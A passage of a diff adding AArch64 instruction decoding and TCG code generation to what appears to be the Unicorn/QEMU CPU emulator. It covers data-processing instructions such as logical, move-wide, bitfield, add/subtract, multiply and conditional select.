tcg_gen_andi_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + is_and = true; + break; + case 0x1: /* ORR */ + tcg_gen_ori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + break; + case 0x2: /* EOR */ + tcg_gen_xori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + break; + default: + assert(FALSE); /* must handle all above */ + break; + } + + if (!sf && !is_and) { + /* zero extend final result; we know we can skip this for AND + * since the immediate had the high 32 bits clear. 
+ */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + + if (opc == 3) { /* ANDS */ + gen_logic_CC(tcg_ctx, sf, tcg_rd); + } +} + +/* + * C3.4.5 Move wide (immediate) + * + * 31 30 29 28 23 22 21 20 5 4 0 + * +--+-----+-------------+-----+----------------+------+ + * |sf| opc | 1 0 0 1 0 1 | hw | imm16 | Rd | + * +--+-----+-------------+-----+----------------+------+ + * + * sf: 0 -> 32 bit, 1 -> 64 bit + * opc: 00 -> N, 10 -> Z, 11 -> K + * hw: shift/16 (0,16, and sf only 32, 48) + */ +static void disas_movw_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + uint64_t imm = extract32(insn, 5, 16); + int sf = extract32(insn, 31, 1); + int opc = extract32(insn, 29, 2); + int pos = extract32(insn, 21, 2) << 4; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_imm; + + if (!sf && (pos >= 32)) { + unallocated_encoding(s); + return; + } + + switch (opc) { + case 0: /* MOVN */ + case 2: /* MOVZ */ + imm <<= pos; + if (opc == 0) { + imm = ~imm; + } + if (!sf) { + imm &= 0xffffffffu; + } + tcg_gen_movi_i64(tcg_ctx, tcg_rd, imm); + break; + case 3: /* MOVK */ + tcg_imm = tcg_const_i64(tcg_ctx, imm); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm, pos, 16); + tcg_temp_free_i64(tcg_ctx, tcg_imm); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.4.2 Bitfield + * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 + * +----+-----+-------------+---+------+------+------+------+ + * | sf | opc | 1 0 0 1 1 0 | N | immr | imms | Rn | Rd | + * +----+-----+-------------+---+------+------+------+------+ + */ +static void disas_bitfield(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, n, opc, ri, si, rn, rd, bitsize, pos, len; + TCGv_i64 tcg_rd, tcg_tmp; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + n = extract32(insn, 22, 1); + ri = extract32(insn, 16, 6); + si = 
extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + bitsize = sf ? 64 : 32; + + if (sf != n || ri >= bitsize || si >= bitsize || opc > 2) { + unallocated_encoding(s); + return; + } + + tcg_rd = cpu_reg(s, rd); + tcg_tmp = read_cpu_reg(s, rn, sf); + + /* OPTME: probably worth recognizing common cases of ext{8,16,32}{u,s} */ + + if (opc != 1) { /* SBFM or UBFM */ + tcg_gen_movi_i64(tcg_ctx, tcg_rd, 0); + } + + /* do the bit move operation */ + if (si >= ri) { + /* Wd = Wn */ + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_tmp, ri); + pos = 0; + len = (si - ri) + 1; + } else { + /* Wd<32+s-r,32-r> = Wn */ + pos = bitsize - ri; + len = si + 1; + } + + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, pos, len); + + if (opc == 0) { /* SBFM - sign extend the destination field */ + tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, 64 - (pos + len)); + tcg_gen_sari_i64(tcg_ctx, tcg_rd, tcg_rd, 64 - (pos + len)); + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C3.4.3 Extract + * 31 30 29 28 23 22 21 20 16 15 10 9 5 4 0 + * +----+------+-------------+---+----+------+--------+------+------+ + * | sf | op21 | 1 0 0 1 1 1 | N | o0 | Rm | imms | Rn | Rd | + * +----+------+-------------+---+----+------+--------+------+------+ + */ +static void disas_extract(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, n, rm, imm, rn, rd, bitsize, op21, op0; + + sf = extract32(insn, 31, 1); + n = extract32(insn, 22, 1); + rm = extract32(insn, 16, 5); + imm = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + op21 = extract32(insn, 29, 2); + op0 = extract32(insn, 21, 1); + bitsize = sf ? 
64 : 32; + + if (sf != n || op21 || op0 || imm >= bitsize) { + unallocated_encoding(s); + } else { + TCGv_i64 tcg_rd, tcg_rm, tcg_rn; + + tcg_rd = cpu_reg(s, rd); + + if (imm) { + /* OPTME: we can special case rm==rn as a rotate */ + tcg_rm = read_cpu_reg(s, rm, sf); + tcg_rn = read_cpu_reg(s, rn, sf); + tcg_gen_shri_i64(tcg_ctx, tcg_rm, tcg_rm, imm); + tcg_gen_shli_i64(tcg_ctx, tcg_rn, tcg_rn, bitsize - imm); + tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rm, tcg_rn); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + } else { + /* tcg shl_i32/shl_i64 is undefined for 32/64 bit shifts, + * so an extract from bit 0 is a special case. + */ + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); + } + } + + } +} + +/* C3.4 Data processing - immediate: top-level decoder, dispatching on insn<28:23> to the immediate-form decoders; unhandled patterns are unallocated encodings. */ +static void disas_data_proc_imm(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 23, 6)) { + case 0x20: case 0x21: /* PC-rel. addressing */ + disas_pc_rel_adr(s, insn); + break; + case 0x22: case 0x23: /* Add/subtract (immediate) */ + disas_add_sub_imm(s, insn); + break; + case 0x24: /* Logical (immediate) */ + disas_logic_imm(s, insn); + break; + case 0x25: /* Move wide (immediate) */ + disas_movw_imm(s, insn); + break; + case 0x26: /* Bitfield */ + disas_bitfield(s, insn); + break; + case 0x27: /* Extract */ + disas_extract(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* Shift a TCGv src by TCGv shift_amount, put result in dst. + * Note that it is the caller's responsibility to ensure that the + * shift amount is in range (ie 0..31 or 0..63) and provide the ARM + * mandated semantics for out of range shifts. 
+ */ +static void shift_reg(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, + enum a64_shift_type shift_type, TCGv_i64 shift_amount) +{ + switch (shift_type) { + case A64_SHIFT_TYPE_LSL: + tcg_gen_shl_i64(tcg_ctx, dst, src, shift_amount); + break; + case A64_SHIFT_TYPE_LSR: + tcg_gen_shr_i64(tcg_ctx, dst, src, shift_amount); + break; + case A64_SHIFT_TYPE_ASR: + if (!sf) { + tcg_gen_ext32s_i64(tcg_ctx, dst, src); + } + tcg_gen_sar_i64(tcg_ctx, dst, sf ? src : dst, shift_amount); + break; + case A64_SHIFT_TYPE_ROR: + if (sf) { + tcg_gen_rotr_i64(tcg_ctx, dst, src, shift_amount); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(tcg_ctx); + t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, t0, src); + tcg_gen_trunc_i64_i32(tcg_ctx, t1, shift_amount); + tcg_gen_rotr_i32(tcg_ctx, t0, t0, t1); + tcg_gen_extu_i32_i64(tcg_ctx, dst, t0); + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free_i32(tcg_ctx, t1); + } + break; + default: + assert(FALSE); /* all shift types should be handled */ + break; + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, dst, dst); + } +} + +/* Shift a TCGv src by immediate, put result in dst. + * The shift amount must be in range (this should always be true as the + * relevant instructions will UNDEF on bad shift immediates). + */ +static void shift_reg_imm(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, + enum a64_shift_type shift_type, unsigned int shift_i) +{ + assert(shift_i < (sf ? 
64 : 32)); + + if (shift_i == 0) { + tcg_gen_mov_i64(tcg_ctx, dst, src); + } else { + TCGv_i64 shift_const; + + shift_const = tcg_const_i64(tcg_ctx, shift_i); + shift_reg(tcg_ctx, dst, src, sf, shift_type, shift_const); + tcg_temp_free_i64(tcg_ctx, shift_const); + } +} + +/* C3.5.10 Logical (shifted register) + * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 + * +----+-----+-----------+-------+---+------+--------+------+------+ + * | sf | opc | 0 1 0 1 0 | shift | N | Rm | imm6 | Rn | Rd | + * +----+-----+-----------+-------+---+------+--------+------+------+ + */ +static void disas_logic_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn, tcg_rm; + unsigned int sf, opc, shift_type, invert, rm, shift_amount, rn, rd; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + shift_type = extract32(insn, 22, 2); + invert = extract32(insn, 21, 1); + rm = extract32(insn, 16, 5); + shift_amount = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (!sf && (shift_amount & (1 << 5))) { + unallocated_encoding(s); + return; + } + + tcg_rd = cpu_reg(s, rd); + + if (opc == 1 && shift_amount == 0 && shift_type == 0 && rn == 31) { + /* Unshifted ORR and ORN with WZR/XZR is the standard encoding for + * register-register MOV and MVN, so it is worth special casing. 
+ */ + tcg_rm = cpu_reg(s, rm); + if (invert) { + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rm); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + } else { + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_rm); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rm); + } + } + return; + } + + tcg_rm = read_cpu_reg(s, rm, sf); + + if (shift_amount) { + shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, shift_amount); + } + + tcg_rn = cpu_reg(s, rn); + + switch (opc | (invert << 2)) { + case 0: /* AND */ + case 3: /* ANDS */ + tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 1: /* ORR */ + tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 2: /* EOR */ + tcg_gen_xor_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 4: /* BIC */ + case 7: /* BICS */ + tcg_gen_andc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 5: /* ORN */ + tcg_gen_orc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + case 6: /* EON */ + tcg_gen_eqv_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + break; + default: + assert(FALSE); + break; + } + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + + if (opc == 3) { + gen_logic_CC(tcg_ctx, sf, tcg_rd); + } +} + +/* + * C3.5.1 Add/subtract (extended register) + * + * 31|30|29|28 24|23 22|21|20 16|15 13|12 10|9 5|4 0| + * +--+--+--+-----------+-----+--+-------+------+------+----+----+ + * |sf|op| S| 0 1 0 1 1 | opt | 1| Rm |option| imm3 | Rn | Rd | + * +--+--+--+-----------+-----+--+-------+------+------+----+----+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * opt: 00 + * option: extension type (see DecodeRegExtend) + * imm3: optional shift to Rm + * + * Rd = Rn + LSL(extend(Rm), amount) + */ +static void disas_add_sub_ext_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm3 = extract32(insn, 10, 3); + int option = extract32(insn, 13, 3); + int 
rm = extract32(insn, 16, 5); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool sf = extract32(insn, 31, 1); + + TCGv_i64 tcg_rm, tcg_rn; /* temps */ + TCGv_i64 tcg_rd; + TCGv_i64 tcg_result; + + if (imm3 > 4) { + unallocated_encoding(s); + return; + } + + /* non-flag setting ops may use SP */ + if (!setflags) { + tcg_rd = cpu_reg_sp(s, rd); + } else { + tcg_rd = cpu_reg(s, rd); + } + tcg_rn = read_cpu_reg_sp(s, rn, sf); + + tcg_rm = read_cpu_reg(s, rm, sf); + ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, option, imm3); + + tcg_result = tcg_temp_new_i64(tcg_ctx); + + if (!setflags) { + if (sub_op) { + tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } + } else { + if (sub_op) { + gen_sub_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } else { + gen_add_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } + } + + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* + * C3.5.2 Add/subtract (shifted register) + * + * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 + * +--+--+--+-----------+-----+--+-------+---------+------+------+ + * |sf|op| S| 0 1 0 1 1 |shift| 0| Rm | imm6 | Rn | Rd | + * +--+--+--+-----------+-----+--+-------+---------+------+------+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * shift: 00 -> LSL, 01 -> LSR, 10 -> ASR, 11 -> RESERVED + * imm6: Shift amount to apply to Rm before the add/sub + */ +static void disas_add_sub_reg(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm6 = extract32(insn, 10, 6); + int rm = extract32(insn, 16, 5); + int shift_type = extract32(insn, 22, 2); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool sf = extract32(insn, 31, 1); + + 
TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn, tcg_rm; + TCGv_i64 tcg_result; + + if ((shift_type == 3) || (!sf && (imm6 > 31))) { + unallocated_encoding(s); + return; + } + + tcg_rn = read_cpu_reg(s, rn, sf); + tcg_rm = read_cpu_reg(s, rm, sf); + + shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, imm6); + + tcg_result = tcg_temp_new_i64(tcg_ctx); + + if (!setflags) { + if (sub_op) { + tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); + } + } else { + if (sub_op) { + gen_sub_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } else { + gen_add_CC(s, sf, tcg_result, tcg_rn, tcg_rm); + } + } + + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* C3.5.9 Data-processing (3 source) + + 31 30 29 28 24 23 21 20 16 15 14 10 9 5 4 0 + +--+------+-----------+------+------+----+------+------+------+ + |sf| op54 | 1 1 0 1 1 | op31 | Rm | o0 | Ra | Rn | Rd | + +--+------+-----------+------+------+----+------+------+------+ + + */ +static void disas_data_proc_3src(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int ra = extract32(insn, 10, 5); + int rm = extract32(insn, 16, 5); + int op_id = (extract32(insn, 29, 3) << 4) | + (extract32(insn, 21, 3) << 1) | + extract32(insn, 15, 1); + bool sf = extract32(insn, 31, 1); + bool is_sub = extract32(op_id, 0, 1); + bool is_high = extract32(op_id, 2, 1); + bool is_signed = false; + TCGv_i64 tcg_op1; + TCGv_i64 tcg_op2; + TCGv_i64 tcg_tmp; + + /* Note that op_id is sf:op54:op31:o0 so it includes the 32/64 size flag */ + switch (op_id) { + case 0x42: /* SMADDL */ + case 0x43: /* SMSUBL */ + case 0x44: /* SMULH */ + is_signed = true; + break; + case 0x0: /* MADD (32bit) */ + case 0x1: /* MSUB (32bit) */ + case 0x40: /* MADD (64bit) */ + case 0x41: 
/* MSUB (64bit) */ + case 0x4a: /* UMADDL */ + case 0x4b: /* UMSUBL */ + case 0x4c: /* UMULH */ + break; + default: + unallocated_encoding(s); + return; + } + + if (is_high) { + TCGv_i64 low_bits = tcg_temp_new_i64(tcg_ctx); /* low bits discarded */ + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_rn = cpu_reg(s, rn); + TCGv_i64 tcg_rm = cpu_reg(s, rm); + + if (is_signed) { + tcg_gen_muls2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); + } else { + tcg_gen_mulu2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); + } + + tcg_temp_free_i64(tcg_ctx, low_bits); + return; + } + + tcg_op1 = tcg_temp_new_i64(tcg_ctx); + tcg_op2 = tcg_temp_new_i64(tcg_ctx); + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + if (op_id < 0x42) { + tcg_gen_mov_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_mov_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } else { + if (is_signed) { + tcg_gen_ext32s_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_ext32s_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); + tcg_gen_ext32u_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); + } + } + + if (ra == 31 && !is_sub) { + /* Special-case MADD with rA == XZR; it is the standard MUL alias */ + tcg_gen_mul_i64(tcg_ctx, cpu_reg(s, rd), tcg_op1, tcg_op2); + } else { + tcg_gen_mul_i64(tcg_ctx, tcg_tmp, tcg_op1, tcg_op2); + if (is_sub) { + tcg_gen_sub_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); + } else { + tcg_gen_add_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); + } + } + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rd)); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* C3.5.3 - Add/subtract (with carry) + * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 10 9 5 4 0 + * +--+--+--+------------------------+------+---------+------+-----+ + * |sf|op| S| 1 1 0 1 0 0 0 0 | rm | opcode2 | Rn | Rd | + * 
+--+--+--+------------------------+------+---------+------+-----+ + * [000000] + */ + +static void disas_adc_sbc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, op, setflags, rm, rn, rd; + TCGv_i64 tcg_y, tcg_rn, tcg_rd; + + if (extract32(insn, 10, 6) != 0) { + unallocated_encoding(s); + return; + } + + sf = extract32(insn, 31, 1); + op = extract32(insn, 30, 1); + setflags = extract32(insn, 29, 1); + rm = extract32(insn, 16, 5); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (op) { + tcg_y = new_tmp_a64(s); + tcg_gen_not_i64(tcg_ctx, tcg_y, cpu_reg(s, rm)); + } else { + tcg_y = cpu_reg(s, rm); + } + + if (setflags) { + gen_adc_CC(s, sf, tcg_rd, tcg_rn, tcg_y); + } else { + gen_adc(s, sf, tcg_rd, tcg_rn, tcg_y); + } +} + +/* C3.5.4 - C3.5.5 Conditional compare (immediate / register) + * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 + * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ + * |sf|op| S| 1 1 0 1 0 0 1 0 |imm5/rm | cond |i/r |o2| Rn |o3|nzcv | + * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ + * [1] y [0] [0] + */ +static void disas_cc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, op, y, cond, rn, nzcv, is_imm; + int label_continue = -1; + TCGv_i64 tcg_tmp, tcg_y, tcg_rn; + + if (!extract32(insn, 29, 1)) { + unallocated_encoding(s); + return; + } + if (insn & (1 << 10 | 1 << 4)) { + unallocated_encoding(s); + return; + } + sf = extract32(insn, 31, 1); + op = extract32(insn, 30, 1); + is_imm = extract32(insn, 11, 1); + y = extract32(insn, 16, 5); /* y = rm (reg) or imm5 (imm) */ + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + nzcv = extract32(insn, 0, 4); + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + 
arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_movi_i64(tcg_ctx, tcg_tmp, nzcv << 28); + gen_set_nzcv(tcg_ctx, tcg_tmp); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + /* match, or condition is always */ + if (is_imm) { + tcg_y = new_tmp_a64(s); + tcg_gen_movi_i64(tcg_ctx, tcg_y, y); + } else { + tcg_y = cpu_reg(s, y); + } + tcg_rn = cpu_reg(s, rn); + + tcg_tmp = tcg_temp_new_i64(tcg_ctx); + if (op) { + gen_sub_CC(s, sf, tcg_tmp, tcg_rn, tcg_y); + } else { + gen_add_CC(s, sf, tcg_tmp, tcg_rn, tcg_y); + } + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + + if (cond < 0x0e) { /* continue */ + gen_set_label(tcg_ctx, label_continue); + } +} + +/* C3.5.6 Conditional select + * 31 30 29 28 21 20 16 15 12 11 10 9 5 4 0 + * +----+----+---+-----------------+------+------+-----+------+------+ + * | sf | op | S | 1 1 0 1 0 1 0 0 | Rm | cond | op2 | Rn | Rd | + * +----+----+---+-----------------+------+------+-----+------+------+ + */ +static void disas_cond_select(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, else_inv, rm, cond, else_inc, rn, rd; + TCGv_i64 tcg_rd, tcg_src; + + if (extract32(insn, 29, 1) || extract32(insn, 11, 1)) { + /* S == 1 or op2<1> == 1 */ + unallocated_encoding(s); + return; + } + sf = extract32(insn, 31, 1); + else_inv = extract32(insn, 30, 1); + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + else_inc = extract32(insn, 10, 1); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (rd == 31) { + /* silly no-op write; until we use movcond we must special-case + * this to avoid a dead temporary across basic blocks. 
+ */ + return; + } + + tcg_rd = cpu_reg(s, rd); + + if (cond >= 0x0e) { /* condition "always" */ + tcg_src = read_cpu_reg(s, rn, sf); + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + } else { + /* OPTME: we could use movcond here, at the cost of duplicating + * a lot of the arm_gen_test_cc() logic. + */ + int label_match = gen_new_label(tcg_ctx); + int label_continue = gen_new_label(tcg_ctx); + + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_src = cpu_reg(s, rm); + + if (else_inv && else_inc) { + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_src); + } else if (else_inv) { + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_src); + } else if (else_inc) { + tcg_gen_addi_i64(tcg_ctx, tcg_rd, tcg_src, 1); + } else { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + } + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + tcg_gen_br(tcg_ctx, label_continue); + /* match: */ + gen_set_label(tcg_ctx, label_match); + tcg_src = read_cpu_reg(s, rn, sf); + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_src); + /* continue: */ + gen_set_label(tcg_ctx, label_continue); + } +} + +static void handle_clz(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_clz64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); + gen_helper_clz(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +static void handle_cls(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_cls64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, 
tcg_tmp32, tcg_rn); + gen_helper_cls32(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +static void handle_rbit(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd, tcg_rn; + tcg_rd = cpu_reg(s, rd); + tcg_rn = cpu_reg(s, rn); + + if (sf) { + gen_helper_rbit64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); + gen_helper_rbit(tcg_ctx, tcg_tmp32, tcg_tmp32); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); + tcg_temp_free_i32(tcg_ctx, tcg_tmp32); + } +} + +/* C5.6.149 REV with sf==1, opcode==3 ("REV64") */ +static void handle_rev64(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (!sf) { + unallocated_encoding(s); + return; + } + tcg_gen_bswap64_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rn)); +} + +/* C5.6.149 REV with sf==0, opcode==2 + * C5.6.151 REV32 (sf==1, opcode==2) + */ +static void handle_rev32(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + + if (sf) { + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); + + /* bswap32_i64 requires zero high word */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_tmp, tcg_rn); + tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_tmp); + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); + tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); + tcg_gen_concat32_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rn)); + tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C5.6.150 REV16 (opcode==1) */ +static void handle_rev16(DisasContext *s, unsigned int sf, + unsigned int rn, unsigned int rd) +{ + 
